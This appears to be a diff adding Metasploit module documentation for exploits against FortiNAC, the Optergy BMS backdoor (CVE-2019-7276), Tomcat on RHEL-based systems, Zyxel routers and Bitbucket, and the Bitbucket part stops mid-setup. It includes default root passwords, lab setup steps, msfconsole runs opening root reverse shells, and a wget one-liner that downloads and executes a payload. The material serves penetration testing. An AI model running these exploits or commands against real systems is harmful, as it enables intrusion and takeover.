+https://github.com/home-assistant/operating-system/issues/2121
+
+Personally I just navigated to the `.ova` file in Windows, right clicked, and chose `7-Zip`, then `Open Archive`,
+and then deleted the `.mf` file that appeared before closing 7-Zip, which did the trick. Once this is done you
+can then import the OVA file into VMWare fine.
+
+Once the OVA file has been imported, but before starting the machine, if you are using VMWare, go into
+`Edit->Virtual Network Editor` and look at the `Subnet Address` section for the `Host Only` adapter. You will
+need this for later sections.
+
+Next change the two interfaces of the imported machine from Bridged to Host Only. Then turn the machine on.
+Once the machine turns on, log in with the following default credentials as outlined in the
+[VMware Virtual Machine Installation Guide](https://fortinetweb.s3.amazonaws.com/docs.fortinet.com/v2/attachments/920a0000-200d-11e9-b6f6-f8bc1258b856/fortinac-vmware-install-85.pdf):
+
+```
+Username: root
+Password: 162PemBnI
+```
+
+Once authenticated successfully, statically set the IP address of the machine using the subnet information you obtained
+earlier. In our case the subnet was `192.168.123.0/24` so we just set the gateway to `192.168.123.1` and set the IP address
+of the machine to `192.168.123.11/24` to set it to a static IP address that is available on this subnet. Be sure to update
+these commands and any of the following commands to replace `192.168.123.11` and `192.168.123.1` with the appropriate
+gateway and host IP addresses.
+
+`configIP 192.168.123.11 255.255.255.0 192.168.123.1`
+
+Navigate to the directory where the license file resides, and then start a Python SimpleHTTPServer web server to
+host files from this directory using the following commands:
+
+```
+cd /bsc/campusMgr
+python -m SimpleHTTPServer 9099
+```
+
+On your local machine download the license file from the Python server started above:
+
+`wget -O licenseKey http://192.168.123.11:9099/.licenseKey`
+
+On your local machine, open the browser of your choice and navigate to:
+
+`https://192.168.123.11:8443/gui`
+
+Authenticate with the default username and password:
+
+```
+Username: root
+Password: YAMS
+```
+
+When installing the software, first accept the license agreement. Then upload the license key, providing the
+the `.licenseKey` file you downloaded from the Python HTTP server and click `Next`. Under `Change Default Passwords`,
+set a username and password for a new admin account that can log in via the GUI, and under `CLI Accounts` set a new
+password for the `root` user to log in via the CLI of the console.
+
+Under the `Select Installation Method` section, select `Manual Installation` and click `OK`. You should be redirected to
+a URL that looks like `https://192.168.116.12:8443/gui/system/config-wizard` and be prompted to provide a license key.
+Just provide the same `.licenseKey` file you downloaded, same procedure and key as you provided earlier and click `OK`.
+
+At this point you should see a page with a header named `BASIC NETWORK`. Set the `Host Name (Do not include domain)`
+field to `localhost` and then under `DNS` section, set the `Domain [example: yourdomain.com]` to `localhost.localdomain`.
+Finally set the `Network Type` to `None`. This is a not a hard requirement but it will save you a lot of
+unnecessary setup. Click `Next` and then `Apply` and click `OK` on the popup that appears.
+
+Once this is done, you will be required to change the default passwords from the GUI and once complete,
+restart the machine by clicking on the `Restart` button. One the machine reboots, you should have a
+vulnerable instance of FortiNAC configured.
+
+## Options
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use exploit/multi/http/fortinac_keyupload_file_upload`
+1. Set the `RHOST` and `LHOST` options
+1. Run the module
+1. Receive a Meterpreter session as the `root` user.
+
+## Scenarios
+### FortiNAC 9.4.0 CMD Target
+
+```
+msf6 > use exploit/linux/http/fortinac_keyupload_file_write
+[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(linux/http/fortinac_keyupload_file_write) > set rhosts 192.168.123.11
+rhosts => 192.168.123.11
+msf6 exploit(linux/http/fortinac_keyupload_file_write) > set lhost 192.168.123.1
+lhost => 192.168.123.1
+msf6 exploit(linux/http/fortinac_keyupload_file_write) > set lport 4044
+lport => 4044
+msf6 exploit(linux/http/fortinac_keyupload_file_write) > run
+
+[*] Started reverse TCP handler on 192.168.123.1:4044
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Target indicated a successful upload occurred!
+[*] Sending zipped cron job to /configWizard/keyUpload.jsp
+[*] Waiting for cron job to run
+[*] Sending stage (24772 bytes) to 192.168.123.11
+[*] Meterpreter session 1 opened (192.168.123.1:4044 -> 192.168.123.11:59938) at 2023-03-09 17:01:02 -0500
+[!] This exploit may require manual cleanup of '/etc/cron.d/ZlzEXbWF' on the target
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer        : localhost.localhost.localdomain
+OS              : Linux 3.10.0-1160.53.1.el7.x86_64 #1 SMP Fri Jan 14 13:59:45 UTC 2022
+Architecture    : x64
+System Language : en_US
+Meterpreter     : python/linux
+meterpreter >
+```
+
+### FortiNAC 9.4.0 Linux x64 Target
+```
+msf6 > use exploit/linux/http/fortinac_keyupload_file_write
+[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(linux/http/fortinac_keyupload_file_write) > show targets
+
+Exploit targets:
+=================
+
+    Id  Name
+    --  ----
+=>  0   CMD
+    1   Linux x86
+    2   Linux x64
+
+
+msf6 exploit(linux/http/fortinac_keyupload_file_write) > set target 2
+target => 2
+msf6 exploit(linux/http/fortinac_keyupload_file_write) > set payload linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/fortinac_keyupload_file_write) > set rhosts 192.168.123.11
+rhosts => 192.168.123.11
+msf6 exploit(linux/http/fortinac_keyupload_file_write) > set lhost 192.168.123.1
+lhost => 192.168.123.1
+msf6 exploit(linux/http/fortinac_keyupload_file_write) > set lport 9909
+lport => 9909
+msf6 exploit(linux/http/fortinac_keyupload_file_write) > run
+
+[*] Started reverse TCP handler on 192.168.123.1:9909
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Target indicated a successful upload occurred!
+[*] Sending zipped payload to /configWizard/keyUpload.jsp
+[*] Sending zipped cron job to /configWizard/keyUpload.jsp
+[*] Waiting for cron job to run
+[*] Sending stage (3045348 bytes) to 192.168.123.11
+[*] Meterpreter session 3 opened (192.168.123.1:9909 -> 192.168.123.11:38266) at 2023-03-09 17:31:01 -0500
+[!] This exploit may require manual cleanup of '/tmp/HcYciseH' on the target
+[!] This exploit may require manual cleanup of '/etc/cron.d/DsxejZgV' on the target
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : localhost.localhost.localdomain
+OS           : CentOS 7.9.2009 (Linux 3.10.0-1160.53.1.el7.x86_64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
+
@@ -0,0 +1,174 @@
+## Vulnerable Application
+
+This module exploits an undocumented backdoor vulnerability (CVE-2019-7276) in the Optergy Proton and Enterprise
+Building Management System (BMS) applications. Versions `2.0.3a` and below are vulnerable.
+Attackers can exploit this issue by directly navigating to an undocumented backdoor script called `Console.jsp`
+in the tools directory and gain full system access.
+Successful exploitation results in `root` command execution using `sudo` as user `optergy`.
+
+Please check out this [AttackerKB Article](https://attackerkb.com/topics/QrYFIjnd3J/cve-2019-7276) for more info.
+
+Installing a vulnerable test bed requires a Linux machine with the vulnerable software loaded.
+Follow instructions [Optergy OVA Download](https://github.com/h00die-gr3y/Metasploit/tree/main/images),
+to download an OVA image with a vulnerable Optergy Proton application (v2.0.3a) installed.
+
+This module has been tested against a Optergy Proton installation with the specifications listed below:
+
+* Optergy Proton
+* Version: `2.0.3a`
+* Linux OS: Debian 7.11
+
+## Verification Steps
+
+1. `use exploit/linux/http/optergy_bms_backdoor_rce_cve_2019_7276`
+1. `set RHOSTS <TARGET HOSTS>`
+1. `set RPORT <port>`
+1. `set LHOST <attacker host ip>`
+1. `set LPORT <attacker host port>`
+1. `set TARGET <0-Unix command, 1-Linux Dropper>`
+1. `exploit`
+1. You should get a `bash` shell or `meterpreter` session depending on the target and payload settings.
+
+## Options
+Option SUDO can be set to escalate to root privileges. Default setting is false.
+
+## Scenarios
+
+### Optergy Proton 2.0.3a on Debian Linux 7.11 - bash reverse shell
+```
+msf6 exploit(linux/http/optergy_bms_backdoor_rce_cve_2019_7276) > check
+[+] 192.168.201.31:80 - The target is vulnerable.
+msf6 exploit(linux/http/optergy_bms_backdoor_rce_cve_2019_7276) > options
+
+Module options (exploit/linux/http/optergy_bms_backdoor_rce_cve_2019_7276):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS   192.168.201.31   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploi
+                                       t/basics/using-metasploit.html
+   RPORT    80               yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   SUDO     false            yes       Set the sudo option to get root privileges
+   URIPATH                   no        The URI to use for this exploit (default is random)
+   VHOST                     no        HTTP server virtual host
+
+
+   When CMDSTAGER::FLAVOR is one of auto,certutil,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an addres
+                                       s on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+
+
+Payload options (cmd/unix/reverse_bash):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.201.10   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/optergy_bms_backdoor_rce_cve_2019_7276) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.10:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[*] Executing Unix Command for cmd/unix/reverse_bash
+[*] Command shell session 1 opened (192.168.201.10:4444 -> 192.168.201.31:43322) at 2023-03-22 12:45:22 +0000
+
+whoami
+optergy
+uname -a
+Linux debian 3.2.0-4-amd64 #1 SMP Debian 3.2.96-2 x86_64 GNU/Linux
+exit
+[*] 192.168.201.31 - Command shell session 1 closed.
+```
+### Optergy Proton 2.0.3a on Debian Linux 7.11 - Linux Dropper Meterpreter session
+```
+msf6 exploit(linux/http/optergy_bms_backdoor_rce_cve_2019_7276) > set target 1
+target => 1
+msf6 exploit(linux/http/optergy_bms_backdoor_rce_cve_2019_7276) > options
+
+Module options (exploit/linux/http/optergy_bms_backdoor_rce_cve_2019_7276):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS   192.168.201.31   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploi
+                                       t/basics/using-metasploit.html
+   RPORT    80               yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   SUDO     false            yes       Set the sudo option to get root privileges
+   URIPATH                   no        The URI to use for this exploit (default is random)
+   VHOST                     no        HTTP server virtual host
+
+
+   When CMDSTAGER::FLAVOR is one of auto,certutil,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an addres
+                                       s on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+
+
+Payload options (linux/x64/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.201.10   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Linux Dropper
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/optergy_bms_backdoor_rce_cve_2019_7276) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.10:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
+[*] Using URL: http://192.168.201.10:8080/JKGheHgpr9TQf
+[*] Client 192.168.201.31 (Wget/1.13.4 (linux-gnu)) requested /JKGheHgpr9TQf
+[*] Sending payload to 192.168.201.31 (Wget/1.13.4 (linux-gnu))
+[*] Sending stage (3045348 bytes) to 192.168.201.31
+[*] Meterpreter session 2 opened (192.168.201.10:4444 -> 192.168.201.31:43377) at 2023-03-22 12:46:57 +0000
+[*] Command Stager progress - 100.00% done (120/120 bytes)
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: optergy
+meterpreter > sysinfo
+Computer     : 192.168.201.31
+OS           : Debian 7.11 (Linux 3.2.0-4-amd64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > exit
+```
+
+## Limitations
+No limitations identified.
@@ -0,0 +1,148 @@
+## Vulnerable Application
+
+This module exploits a vulnerability in RedHat based systems where
+improper file permissions are applied to `/usr/lib/tmpfiles.d/tomcat.conf`
+for Apache Tomcat versions before 7.0.54-8.  This may also work against
+
+The configuration files in `tmpfiles.d` are used by `systemd-tmpfiles` to manage
+temporary files including their creation.
+
+With this weak permission, we're able to inject commands into `systemd-tmpfiles`
+service to write a cron job to execute our payload.
+
+`systemd-tmpfiles` is executed by default on boot on RedHat-based systems
+through `systemd-tmpfiles-setup.service`. Depending on the system in use,
+the execution of `systemd-tmpfiles` could also be triggered by other
+services, cronjobs, startup scripts etc.
+
+This module was tested against Tomcat 7.0.54-3 on Fedora 21.
+
+### Install
+
+This will install Tomcat 7 (7.0.54-3) on Fedora 21.
+
+We also change the `tomcat` user's shell to `/bin/bash` to make setting up the priv-esc
+easier.
+
+```
+wget https://archive.fedoraproject.org/pub/archive/fedora/linux/releases/21/Everything/x86_64/os/Packages/t/tomcat-7.0.54-3.fc21.noarch.rpm
+wget https://archive.fedoraproject.org/pub/archive/fedora/linux/releases/21/Everything/x86_64/os/Packages/t/tomcat-lib-7.0.54-3.fc21.noarch.rpm
+wget https://archive.fedoraproject.org/pub/archive/fedora/linux/releases/21/Everything/x86_64/os/Packages/a/apache-commons-collections-3.2.1-20.fc21.noarch.rpm
+wget https://archive.fedoraproject.org/pub/archive/fedora/linux/releases/21/Everything/x86_64/os/Packages/a/apache-commons-daemon-1.0.15-8.fc21.x86_64.rpm
+wget https://archive.fedoraproject.org/pub/archive/fedora/linux/releases/21/Everything/x86_64/os/Packages/a/apache-commons-dbcp-1.4-16.fc21.noarch.rpm
+wget https://archive.fedoraproject.org/pub/archive/fedora/linux/releases/21/Everything/x86_64/os/Packages/a/apache-commons-logging-1.1.3-14.fc21.noarch.rpm
+wget https://archive.fedoraproject.org/pub/archive/fedora/linux/releases/21/Everything/x86_64/os/Packages/a/apache-commons-pool-1.6-9.fc21.noarch.rpm
+wget https://archive.fedoraproject.org/pub/archive/fedora/linux/releases/21/Everything/x86_64/os/Packages/t/tomcat-el-2.2-api-7.0.54-3.fc21.noarch.rpm
+wget https://archive.fedoraproject.org/pub/archive/fedora/linux/releases/21/Everything/x86_64/os/Packages/t/tomcat-jsp-2.2-api-7.0.54-3.fc21.noarch.rpm
+wget https://archive.fedoraproject.org/pub/archive/fedora/linux/releases/21/Everything/x86_64/os/Packages/t/tomcat-servlet-3.0-api-7.0.54-3.fc21.noarch.rpm
+wget https://archive.fedoraproject.org/pub/archive/fedora/linux/releases/21/Everything/x86_64/os/Packages/e/ecj-4.4.0-1.fc21.noarch.rpm
+wget https://archive.fedoraproject.org/pub/archive/fedora/linux/releases/21/Everything/x86_64/os/Packages/g/geronimo-jta-1.1.1-17.fc21.noarch.rpm
+wget https://archive.fedoraproject.org/pub/archive/fedora/linux/releases/21/Everything/x86_64/os/Packages/g/geronimo-jms-1.1.1-19.fc21.noarch.rpm
+wget https://archive.fedoraproject.org/pub/archive/fedora/linux/releases/21/Everything/x86_64/os/Packages/l/log4j12-1.2.17-7.fc21.noarch.rpm
+wget https://archive.fedoraproject.org/pub/archive/fedora/linux/releases/21/Everything/x86_64/os/Packages/j/javamail-1.5.1-3.fc21.noarch.rpm
+rpm -i *.rpm
+sudo sed -i 's|/bin/nologin|/bin/bash|g' /etc/passwd
+```
+
+You can now `su tomcat` and get your starter shell.
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Get an initial shell as the `tomcat` user
+4. Do: `use exploit/linux/local/tomcat_rhel_based_temp_priv_esc`
+5. Do: `set session #`
+6. Do: `run`
+7. You should get a root shell.
+
+## Options
+
+### WritableDir
+
+A directory where we can write and execute files. Defaults to `/tmp`.
+
+## Scenarios
+
+### Tomcat 7 (7.0.54-3) on Fedora 21
+
+Initial shell
+
+```
+msf6 > use exploit/multi/script/web_delivery
+[*] Using configured payload python/meterpreter/reverse_tcp
+msf6 exploit(multi/script/web_delivery) > set lhost 1.1.1.1
+lhost => 1.1.1.1
+msf6 exploit(multi/script/web_delivery) > set target 7
+target => 7
+msf6 exploit(multi/script/web_delivery) > set payload linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/script/web_delivery) > exploit
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+msf6 exploit(multi/script/web_delivery) > 
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Using URL: http://1.1.1.1:8080/fGd5wnh85
+[*] Server started.
+[*] Run the following command on the target machine:
+wget -qO TbT9zhqH --no-check-certificate http://1.1.1.1:8080/fGd5wnh85; chmod +x TbT9zhqH; ./TbT9zhqH& disown
+
+msf6 exploit(multi/script/web_delivery) > 
+[*] 2.2.2.2      web_delivery - Delivering Payload (250 bytes)
+[*] Sending stage (3045348 bytes) to 2.2.2.2
+[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:41270) at 2023-01-19 15:22:23 -0500
+
+msf6 exploit(multi/script/web_delivery) > jobs -K
+Stopping all jobs...
+
+[*] Server stopped.
+msf6 exploit(multi/script/web_delivery) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: tomcat
+meterpreter > sysinfo
+Computer     : localhost.domain
+OS           : Fedora 21 (Linux 3.17.4-301.fc21.x86_64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > background
+[*] Backgrounding session 1...
+```
+
+Priv Esc
+
+```
+msf6 exploit(multi/script/web_delivery) > use exploit/linux/local/tomcat_rhel_based_temp_priv_esc
+[*] Using configured payload linux/x64/meterpreter_reverse_tcp
+msf6 exploit(linux/local/tomcat_rhel_based_temp_priv_esc) > set verbose true
+verbose => true
+msf6 exploit(linux/local/tomcat_rhel_based_temp_priv_esc) > set session 1
+session => 1
+msf6 exploit(linux/local/tomcat_rhel_based_temp_priv_esc) > set lhost 1.1.1.1
+lhost => 1.1.1.1
+msf6 exploit(linux/local/tomcat_rhel_based_temp_priv_esc) > exploit
+
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Vulnerable app version detected: 7.0.54.pre.3
+[*] Creating backup of /usr/lib/tmpfiles.d/tomcat.conf
+[+] Original /usr/lib/tmpfiles.d/tomcat.conf backed up to /root/.msf4/loot/20230119152336_default_2.2.2.2_usrlibtmpfile_530018.txt
+[*] Uploading Payload to /tmp/.4ptbf6f4fW
+[*] Writing '/tmp/.4ptbf6f4fW' (1068640 bytes) ...
+[*] Writing permission elevation into /usr/lib/tmpfiles.d/tomcat.conf
+[*] Creating cron job in /etc/cron.d/grPwZ
+[+] Waiting 1800 seconds on tmpfiles-setup.service to restart (/usr/bin/systemd-tmpfiles --create)
+[*] Sleeping for 2 seconds before attempting again
+[*] Sleeping for 4 seconds before attempting again
+[*] Sleeping for 8 seconds before attempting again
+[-] /etc/cron.d/grPwZ not found, checking in 10 seconds
+[*] Waiting on cron to kick the payload (~1 minute)
+[+] Deleted /tmp/.4ptbf6f4fW
+[+] Deleted /etc/cron.d/grPwZ
+[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:41271) at 2023-01-19 15:24:24 -0500
+
+meterpreter > getuid
+Server username: root
+```
@@ -0,0 +1,155 @@
+## Vulnerable Application
+
+This module exploits a buffer-overflow in multiple Zyxel devices. The vulnerabilitiy stems from missing string length
+checks. The vulnerability can only be exploited from the LAN side, but does not require authentication. As ASLR is
+activated, the libc address will be bruteforced. Thus the webserver will crash until successfull exploitation. On
+average this process takes 20 minutes.
+
+This vulnerability was discovered by Steffen Robertz, Gerhard Hechenberger, Stefan Viehboeck and Thomas Weber of the SEC
+Consult Vulnerability Lab in Vienna. The full writeup of all vulnerabilities is available here:
+[https://sec-consult.com/vulnerability-lab/advisory/multiple-critical-vulnerabilities-in-multiple-zyxel-devices/]
+
+
+| Device       | Firmware  |
+| ------------ | --------- |
+| AMG1302-T11C | EOL       |
+| VMG3925-B10C | EOL       |
+| VMG8924-B10D | EOL       |
+| VMG1312-B10D | EOL       |
+| VMG3312-T20A | EOL       |
+| VMG3625-T20A | EOL       |
+| VMG3925-B10B | EOL       |
+| VMG3925-B10C | EOL       |
+| VMG3925-B30C | EOL       |
+| VMG3926-B10A | EOL       |
+| VMG5313-B10B | EOL       |
+| VMG5313-B30B | EOL       |
+| VMG8623-T50A | EOL       |
+| VMG8823-B10B | EOL       |
+| VMG8823-B30B | EOL       |
+| VMG8823-B50B | EOL       |
+| VMG8823-B60B | EOL       |
+| VMG8924-B10D | EOL       |
+| VMG8924-B30D | EOL       |
+| PMG5317-T20A | EOL       |
+| DX3301-T0 | V5.50(ABVY.3)C0 |
+| DX5401-B0 | V5.17(ABYO.1)C0 |
+| EMG3525-T50B | EMEA - V5.50(ABPM.6)C0 |
+| EMG3525-T50B | S. America - V5.50(ABSL.0)b12 |
+| EMG5523-T50B | EMEA - V5.50(ABPM.6)C0 |
+| EMG5523-T50B | S. America - V5.50(ABSL.0)b12 |
+| EMG5723-T50K | V5.50(ABOM.7)C0 |
+| EX3301-T0 | V5.50(ABVY.3)C0 |
+| EX5401-B0 | V5.17(ABYO.1)C0 |
+| EX5501-B0 | V5.17(ABRY.2)C0 |
+| LTE3301-PLUS | V1.00(ABQU.3)C0 |
+| LTE7240-M403 | V2.00(ABMG.4)C0 |
+| VMG1312-T20B | V5.50(ABSB.5)C0 |
+| VMG3625-T50B | V5.50(ABPM.6)C0 |
+| VMG3927-B50A | V5.17(ABMT.6)C0 |
+| VMG3927-B60A | V5.17(ABMT.6)C0 |
+| VMG3927-T50K | V5.50(ABOM.7)C0 |
+| VMG4005-B50A | V5.15(ABQA.2)C0 |
+| VMG8623-T50B | V5.50(ABPM.6)C0 |
+| VMG8825-B50A | V5.17(ABMT.6)C0 |
+| VMG8825-B50B | V5.17(ABNY.7)C0 |
+| VMG8825-B60A | V5.17(ABMT.6)C0 |
+| VMG8825-B60B | V5.17(ABNY.7)C0 |
+| VMG8825-T50K | V5.50(ABOM.7)C0 |
+| XMG3927-B50A | V5.17(ABMT.6)C0 |
+| XMG8825-B50A | V5.17(ABMT.6)C0 |
+| VPN2S | V1.20(ABLN.2)_00210319C1 |
+| AX7501-B0 | V5.17(ABPC.1)C0 |
+| EP240P | V5.40(ABVH.1)C0 |
+| PMG5317-T20B | V5.40(ABKI.4)C0 |
+| PMG5617GA | V5.40(ABNA.2)C0 |
+| PMG5622GA | V5.40(ABNB.2)C0 |
+| WX3100-T0 | V5.50(ABVL.1)C0 |
+| WX3401-B0 | V5.17(ABVE.1)C0 |
+| WSQ50 (Multy X) | V2.20(ABKJ.7)C0 |
+| WSQ60 (Multy Plus) | V2.20(ABND.8)C0 |
+
+## Verification Steps
+ Follow these steps to exploit the target:
+
+  1. Connect to a target on the LAN interface
+  2. Start msfconsole
+  3. Do: `use exploit/linux/misc/zyxel_multiple_devices_zhttp_lan_rce`
+  4. Set RHOST, LHOST and SRVHOST
+  5. Do `check`
+  6. Do: `run`
+  7. You should get a shell. On average this will take 20 minutes.
+## Options
+```
+Module options (exploit/linux/misc/zyxel_multiple_devices_zhttp_lan_rce):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT    80               yes       The target port (TCP)
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                   no        The URI to use for this exploit (default is random)
+   VHOST                     no        HTTP server virtual host
+   
+
+Payload options (linux/armle/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+```
+
+
+
+## Scenarios
+```
+msf6 > use exploit/linux/misc/zyxel_multiple_devices_zhttp_lan_rce
+[*] Using configured payload linux/armle/meterpreter/reverse_tcp
+msf6 exploit(linux/misc/zyxel_multiple_devices_zhttp_lan_rce) > set LHOST XXX.XXX.XXX.XXX
+LHOST => XXX.XXX.XXX.XXX
+msf6 exploit(linux/misc/zyxel_multiple_devices_zhttp_lan_rce) > set RHOSTS XXX.XXX.XXX.XXX
+RHOSTS => XXX.XXX.XXX.XXX
+msf6 exploit(linux/misc/zyxel_multiple_devices_zhttp_lan_rce) > check
+[+] XXX.XXX.XXX.XXX:80 - The target is vulnerable.
+msf6 exploit(linux/misc/zyxel_multiple_devices_zhttp_lan_rce) > set SRVHOST XXX.XXX.XXX.XXX
+SRVHOST => XXX.XXX.XXX.XXX
+msf6 exploit(linux/misc/zyxel_multiple_devices_zhttp_lan_rce) > run
+
+[*] Started reverse TCP handler on XXX.XXX.XXX.XXX:4444
+[*] Attempting to exploit VMG3312-T20A <= EOL
+[*] Starting up our web service on XXX.XXX.XXX.XXX:8080 ...
+[*] Using URL: http://XXX.XXX.XXX.XXX:8080/o
+[*] Going to bruteforce ASLR, this will take a while...
+[*] Trying to overflow the buffer, attempt 1
+[*] Trying to overflow the buffer, attempt 2
+[*] Trying to overflow the buffer, attempt 3
+[*] Trying to overflow the buffer, attempt 4
+[*] Trying to overflow the buffer, attempt 5
+[*] Trying to overflow the buffer, attempt 6
+[*] Trying to overflow the buffer, attempt 7
+[*] Trying to overflow the buffer, attempt 8
+[*] Trying to overflow the buffer, attempt 9
+[*] Trying to overflow the buffer, attempt 10
+[...]
+[*] Trying to overflow the buffer, attempt 135
+[*] Trying to overflow the buffer, attempt 136
+[*] Trying to overflow the buffer, attempt 137
+[*] Trying to overflow the buffer, attempt 138
+[*] Trying to overflow the buffer, attempt 139
+[+] XXX.XXX.XXX.XXX:80 - Sending executable to the router
+[+] XXX.XXX.XXX.XXX:80 - A shell should connect soon!
+[*] Sending stage (908480 bytes) to XXX.XXX.XXX.XXX
+[*] Meterpreter session 1 opened (XXX.XXX.XXX.XXX:4444 -> XXX.XXX.XXX.XXX:55253) at 2022-07-24 19:03:41 +0200
+[*] Server stopped.
+
+meterpreter > shell
+Process 9871 created.
+Channel 1 created.
+id
+uid=0(root) gid=0
+```
@@ -0,0 +1,272 @@
+## Vulnerable Application
+
+For various versions of Bitbucket, there is an authenticated command injection
+vulnerability that can be exploited by injecting environment
+variables into a user name. This module achieves remote code execution
+as the `atlbitbucket` user by injecting the `GIT_EXTERNAL_DIFF` environment
+variable, a null character as a delimiter, and arbitrary code into a user's
+user name. The value (payload) of the `GIT_EXTERNAL_DIFF` environment variable
+will be run once the Bitbucket application is coerced into generating a diff.
+
+This module requires at least admin credentials, as admins and above only have the
+option to change their user name.
+
+The [advisory](https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-security-advisory-2022-11-16-1180141667.html) lists the following versions as vulnerable:
+
+    * 7.0 to 7.5 (all versions)
+    * 7.6.0 to 7.6.18
+    * 7.7 to 7.16 (all versions)
+    * 7.17.0 to 7.17.11
+    * 7.18 to 7.20 (all versions)
+    * 7.21.0 to 7.21.5
+
+If mesh.enabled=false is set in bitbucket.properties:
+
+    * 8.0.0 to 8.0.4
+    * 8.1.0 to 8.1.4
+    * 8.2.0 to 8.2.3
+    * 8.3.0 to 8.3.2
+    * 8.4.0 to 8.4.1
+
+### Installation Instructions
+
+1. Install Git on the target machine
+  * For Linux
+    * sudo apt install -y git
+  * For Windows
+    * Download an [installer](https://github.com/git-for-windows/git/releases/download/v2.39.2.windows.1/Git-2.39.2-64-bit.exe)
+    * Selecting all defaults should be fine
+2. Download a vulnerable version of Bitbucket. For example, version `7.18.1` can be found
+[here for Linux](https://www.atlassian.com/software/stash/downloads/binary/atlassian-bitbucket-7.18.1-x64.bin) and [here for Windows](https://www.atlassian.com/software/stash/downloads/binary/atlassian-bitbucket-7.18.1-x64.exe)
+3. For Linux, make sure the resulting bin file is executable and run it. Just double click on the installer file if using Windows
+  * chmod +x atlassian-bitbucket-8.3.0-x64.bin && sudo ./atlassian-bitbucket-8.3.0-x64.bin
+4. An installation wizard will pop up. Make sure `Install a new instance` is checked, then click `Next`
+5. Check `Install a Server instance` and click `Next`
+6. If the default destination directory looks good, click `Next`
+7. Click `Next` if the default Bitbucket data directory looks fine
+8. Make sure the `Use default HTTP port (7990)` selection is checked and click `Next`
+9. Make sure the `Install Bitbucket as a service` box is checked and click `Next`
+10. Click `Install` if everything looks correct on the summary screen
+11. Once the installation completes, make sure the `Would you like to launch Bitbucket` option is selected
+and click `Next`
+12. Ensure `Launch Bitbucket <version> in browser` is selected and click `Finish`
+13. Navigate to the Bitbucket setup page (http://localhost:7990) and select the `I need an evaluation license` option
